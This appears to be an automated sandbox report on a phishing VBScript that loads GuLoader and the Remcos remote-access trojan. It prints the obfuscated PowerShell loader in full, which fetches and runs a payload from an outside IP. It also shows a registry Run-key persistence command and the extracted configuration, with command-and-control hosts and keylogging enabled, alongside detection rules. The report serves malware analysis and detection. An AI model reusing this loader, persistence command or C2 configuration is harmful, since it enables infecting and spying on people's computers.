Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_La-Tanerie04180240124.vbs

Overview

General Information

Sample name:PO_La-Tanerie04180240124.vbs
Analysis ID:1431648
MD5:f08f508e797fa19d89a8a4688019fd99
SHA1:32de77ff5689fbc68f64aa9cfd4405cc2686fd85
SHA256:610119f52d69e8132b0130740836426d0b25fe5300ee4e12f2c51d1e36fec546
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6924 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5768 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5552 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3980 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 6872 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 5800 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 332 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "darvien99lakoustr01.duckdns.org:3770:0darvien99lakoustr01.duckdns.org:3771:1darvien99lakoustr02.duckdns.org:3770:0", "Assigned name": "Protect", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "akmsnxbfg-E906PA", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "lmouitrs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\lmouitrs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.2953979686.0000000005159000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.2315688499.0000000008610000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000001.00000002.2397266995.000001E3D03D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000007.00000002.2315989760.0000000009092000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            00000007.00000002.2306786196.00000000059B3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 3 entries
              SourceRuleDescriptionAuthorStrings
              amsi32_5552.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xd26e:$b2: ::FromBase64String(
              • 0xc348:$s1: -join
              • 0x5af4:$s4: +=
              • 0x5bb6:$s4: +=
              • 0x9ddd:$s4: +=
              • 0xbefa:$s4: +=
              • 0xc1e4:$s4: +=
              • 0xc32a:$s4: +=
              • 0x152ca:$s4: +=
              • 0x1534a:$s4: +=
              • 0x15410:$s4: +=
              • 0x15490:$s4: +=
              • 0x15666:$s4: +=
              • 0x156ea:$s4: +=
              • 0xcb13:$e4: Get-WmiObject
              • 0xcd02:$e4: Get-Process
              • 0xcd5a:$e4: Start-Process
              • 0x13dd3:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs", ProcessId: 6924, ProcessName: wscript.exe
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6872, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)", ProcessId: 5800, ProcessName: cmd.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Calpack
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5800, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)", ProcessId: 332, ProcessName: reg.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6872, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)", ProcessId: 5800, ProcessName: cmd.exe
              Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Calpack
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs", ProcessId: 6924, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastan
              Timestamp:04/25/24-15:12:15.113453
              SID:2032776
              Source Port:49739
              Destination Port:3770
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: 00000009.00000002.2953979686.0000000005159000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "darvien99lakoustr01.duckdns.org:3770:0darvien99lakoustr01.duckdns.org:3771:1darvien99lakoustr02.duckdns.org:3770:0", "Assigned name": "Protect", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "akmsnxbfg-E906PA", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "lmouitrs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: http://87.121.105.163/Flyvnings.u32Virustotal: Detection: 20%Perma Link
              Source: http://87.121.105.163/YSnpkrCwWalJFSpN146.binVirustotal: Detection: 10%Perma Link
              Source: http://87.121.105.163Virustotal: Detection: 18%Perma Link
              Source: PO_La-Tanerie04180240124.vbsReversingLabs: Detection: 33%
              Source: PO_La-Tanerie04180240124.vbsVirustotal: Detection: 44%Perma Link
              Source: Yara matchFile source: 00000009.00000002.2953979686.0000000005159000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\lmouitrs.dat, type: DROPPED
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2310028531.0000000007210000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb01O source: powershell.exe, 00000007.00000002.2310028531.0000000007302000.00000004.00000020.00020000.00000000.sdmp
